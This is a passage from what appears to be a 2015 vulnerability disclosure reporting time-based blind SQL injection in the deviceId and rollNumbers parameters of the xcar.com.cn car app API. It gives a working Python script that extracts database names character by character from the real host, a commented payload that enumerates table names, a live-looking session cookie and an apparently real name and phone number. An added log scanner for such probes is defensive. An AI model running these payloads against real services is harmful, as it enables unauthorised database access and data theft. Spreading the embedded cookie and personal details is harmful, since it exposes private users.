2015-10-30: Details sent to the vendor, awaiting vendor handling
2015-10-30: Vendor confirmed; details disclosed to the vendor only
2015-11-09: Details disclosed to core whitehats and relevant domain experts
2015-11-19: Details disclosed to ordinary whitehats
2015-11-29: Details disclosed to intern whitehats
2015-12-14: Details disclosed to the public
SQL injection in the 爱卡汽车 (xcar.com.cn) app; it turns out to sit on a different database server, with several new databases
Target: the official 爱卡汽车 app. Testing the 爱买车 (car-buying) feature found SQL injection at the following location (injected parameter 1: deviceId, time-based blind; injected parameter 2: rollNumbers, time-based blind):
http://mi.xcar.com.cn/interface/gcpapp/lottoryQuery.php?cityId=475&deviceId=A0000038000000&deviceType=0&rollNumbers=-1
Because there is filtering, I wrote a Python script (using database() as the example; the script goes through a proxy, remove it when testing). Also, this is not the same database server as before; it is clearly a different machine.
#!/usr/bin/env python
# coding=utf8
# Time-based blind extraction of database(), one character at a time.
# A character is accepted only after the 3-second delay is observed twice.
import httplib, time

database = ''        # value recovered so far (ASCII)
temp_database = ''   # the same value as a hex string, used as the LIKE prefix
httpClient = None
count = 0            # 1 = delay seen once for this character, re-test to confirm
i = 33               # printable ASCII range 33..127

while i < 128:
    if i == 37:      # skip '%', a LIKE wildcard
        i = i + 1
    try:
        # POST body used against another endpoint (kept for reference, not sent here):
        #params = 'appName=1&carId=23113&channelId=126&cityId=484&description=%E5%A5%BD%E7%9A%84&desireId=22&desires=%E7%99%BD%E5%A4%96%E9%BB%91%E5%86%85%2C%E7%8E%B0%E8%BD%A6%2C%E4%BC%98%E6%83%A05000%2C%E9%80%89%E8%A3%85%E6%B0%99%E7%81%AF&deviceId=A0000038518D0C&&deviceType=2&did_all=(select(0)from(select(case when ((select GROUP_CONCAT(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x474f434152) like 0x'+temp_database+str(hex(i))[2:]+'25) then sleep(3) else sleep(0) end))v)&encryptedTelephone=03ce7ab07859e52a030105e0c48bfa98&name=陈静&provinceId=3&quickDesire=0&telephone=13525698541&uid=9706075&ver=3.1'
        headers = {
            "Host": "mi.xcar.com.cn",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
            "Accept-Encoding": "gzip,deflate",
            "Accept": "*/*",
            "Cookie": "iphonecookie=d986Lj6fkWsE3MM/QdTmjPQhCAaTgrGFPrkjbvnp4STEMwWqMXd5RxvN15ksoTHy4HV3NZPP7B7v3ReafyKA4adBwBBq6IBA5lab2fFAKWvzKgV9KxBlIeGjc0Oz20/JKQ;",
            "Connection": "keep-alive",
            #"Content-Type": "application/x-www-form-urlencoded",
            #"Content-Length": len(params),
        }
        # The request is sent through a local proxy; remove this when testing.
        httpClient = httplib.HTTPConnection("192.168.1.2", 8080, timeout=30)
        # LIKE 0x<prefix><candidate>25 : hex-encoded prefix, candidate char, '%'
        url = ('http://mi.xcar.com.cn/interface/gcpapp/lottoryQuery.php?cityId=475&deviceId=A0000038000000\'%20and%20(select(0)from(select(case%20when%20(database()%20like%200x'
               + temp_database + str(hex(i))[2:]
               + '25)%20then%20sleep(3)%20else%20sleep(0)%20end))v)%20--%20-%20&deviceType=0&rollNumbers=-1')
        httpClient.request("GET", url=url, headers=headers)
        st = time.time()
        response = httpClient.getresponse()
        rp = response.read()
        if count == 1:
            if time.time() - st > 3:
                # Delay seen twice: accept the character and start the next position.
                temp_database = temp_database + str(hex(i))[2:]
                database = database + chr(i)
                print 'Tables: ', database
                i = 32   # the increment below brings this back to 33
                count = 0
            else:
                count = 0
        elif time.time() - st > 3:
            # First delay for this character: re-test it before accepting.
            count = 1
            i = i - 1
        i = i + 1
    except Exception, e:
        print e
    finally:
        if httpClient:
            httpClient.close()
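From the defender's side, the probe above has a recognisable shape in web access logs. The following scanner is an added example, not code from the original report: it flags requests whose deviceId or rollNumbers value (the two parameters the report names) carries a delay function together with a CASE WHEN wrapper or a quote-then-AND breakout, run over constructed log lines modelled on the report's URL.

```python
"""Flag time-based blind SQL injection probes in web access logs."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# The two parameters the report identifies as injectable on this endpoint.
WATCHED_PARAMS = ("deviceId", "rollNumbers")

# Indicators matched against the URL-decoded parameter value, case-insensitively:
# a delay function call, a CASE WHEN wrapper, and a quote-then-AND/OR breakout.
TIME_DELAY_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)
CASE_RE = re.compile(r"\bcase\s+when\b", re.I)
QUOTE_BREAKOUT_RE = re.compile(r"['\"]\s*(and|or)\b", re.I)

# Request line inside a common-log-format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Constructed sample log lines (not real traffic): a benign request, then probes of
# the shape shown in the report on deviceId and on rollNumbers.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Oct/2015:10:01:02 +0800] "GET /interface/gcpapp/lottoryQuery.php?cityId=475&deviceId=A0000038000000&deviceType=0&rollNumbers=-1 HTTP/1.1" 200 312
203.0.113.7 - - [30/Oct/2015:10:01:09 +0800] "GET /interface/gcpapp/lottoryQuery.php?cityId=475&deviceId=A0000038000000'%20and%20(select(0)from(select(case%20when%20(database()%20like%200x7025)%20then%20sleep(3)%20else%20sleep(0)%20end))v)%20--%20-%20&deviceType=0&rollNumbers=-1 HTTP/1.1" 200 312
203.0.113.7 - - [30/Oct/2015:10:01:15 +0800] "GET /interface/gcpapp/lottoryQuery.php?cityId=475&deviceId=A0000038000000&deviceType=0&rollNumbers=-1'%20AND%20SLEEP(3)--%20- HTTP/1.1" 200 312
"""


def suspicious_params(request_target):
    """Return the watched parameters whose value carries a time-based probe."""
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    hits = []
    for name in WATCHED_PARAMS:
        for raw in params.get(name, []):
            value = unquote_plus(raw)  # second decode catches double-encoded input
            score = sum(bool(p.search(value))
                        for p in (TIME_DELAY_RE, CASE_RE, QUOTE_BREAKOUT_RE))
            if score >= 2:  # at least two of the three indicators together
                hits.append(name)
    return hits


def scan_log(text):
    """Return (line_number, [param, ...]) for every log line with a suspicious request."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        names = suspicious_params(m.group(1)) if m else []
        if names:
            findings.append((n, names))
    return findings
```

Running `scan_log(SAMPLE_LOG)` reports line 2 (deviceId) and line 3 (rollNumbers); the benign first line is not flagged.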
1. SQLMap proof of the vulnerability
2. Current database user
3. 4 databases in total; the current database is push
4. A cross-database look at the first three tables of the app_kc database
Comments welcome.
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-10-30 11:19
Thanks to @路人甲 for the submission; the issue has been confirmed and we will fix it as soon as possible!
None yet